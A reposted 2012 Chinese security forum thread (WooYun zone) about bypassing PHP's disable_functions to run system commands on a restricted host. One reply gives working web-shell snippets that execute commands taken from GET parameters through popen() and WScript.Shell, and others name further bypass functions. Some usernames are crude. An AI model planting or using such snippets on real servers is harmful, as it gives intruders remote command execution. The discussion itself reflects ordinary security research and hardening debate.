php的disabled function禁用成这个程度了,还有解么

  • A+
所属分类:lcx

disable_functions:phpinfo,passthru,system,chroot,scandir,chgrp,shell_exec,proc_open,proc_get_status,ini_after,ini_after,ini_restore,dl,pfsockopen,openlog,sysl,exec,chmod,file_put_contents


木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 10:09

preg_replace即可

xsjswt | 2012-09-24 10:23

@木易木兆 亲,不是执行php命令,是想执行系统命令,或者做个代理,扫端口什么的

 

xsser (十根阳具有长短,世上人多心不齐) | 2012-09-24 11:22

太easy了,出10个wb我给你三种姿势绕过的方法

 

木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 11:23

@xsser 10个基友之吻行不行?

 

蟋蟀哥哥 (http://zone.wooyun.org/?do=action) | 2012-09-24 11:29

@xsser 几种体位?

 

GaRY | 2012-09-24 13:10

@xsser 出招了,lz接着

 

goderci () | 2012-09-24 13:20

@xsjswt @xsser 敲诈楼主不解释

 

cnrstar (Be My Personal Best!) | 2012-09-24 13:21

姿势1:popen()

if (key($_GET)=="popen") {
       $pp = popen($_GET['popen'], 'r');
       $read = fread($pp, 2096);
       echo $read;
       pclose($pp);

姿势2 wscript.shell

if (key($_GET)=="wscript") {
       $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed");
       $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");
       $stdout = $exec->StdOut();
       $stroutput = $stdout->ReadAll();
       echo $stroutput;
     }

姿势3 Shell.Application

open("C:windowssystem32calc.exe"); 
?>

 

xsjswt | 2012-09-24 14:21

@cnrstar popen在安全模式下要被XX,那个安全目录是undef

 

xsjswt | 2012-09-24 14:21

@cnrstar stuhome是Linux的

 

xsser (十根阳具有长短,世上人多心不齐) | 2012-09-24 14:30

@xsjswt 都安全模式了 你去死

 

cnrstar (Be My Personal Best!) | 2012-09-24 15:32

@xsjswt @xsser 安全模式下貌似真是无解的。。反正我是看到安全模式就不知道怎么执行命令了。

 

Lmy | 2012-09-24 15:46

我也头大呢。求解。。

 

Matt | 2012-09-24 15:56

ssh_exec

 

xsjswt | 2012-09-24 16:01

@xsser 你不是很多姿势的么

 

xsjswt | 2012-09-24 16:03

@Matt 也算,但是和expect:// ssh://一样是要装拓展的,人家米装的嘛,或者装的人根本没几个

 

CHForce | 2012-09-24 18:54

rank == 0 的路过

 

摘自:http://zone.wooyun.org/content/1114

文章来源于lcx.cc:php的disabled function禁用成这个程度了,还有解么

相关推荐: python 乌云账号暴力猜解工具

python 乌云账号暴力猜解工具 Rona (111) | 2014-09-24 17:19 需要预安装如下程序 1、pytesseract (可以pip install pytesseract安装) 2、Python Imaging Library (PI…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: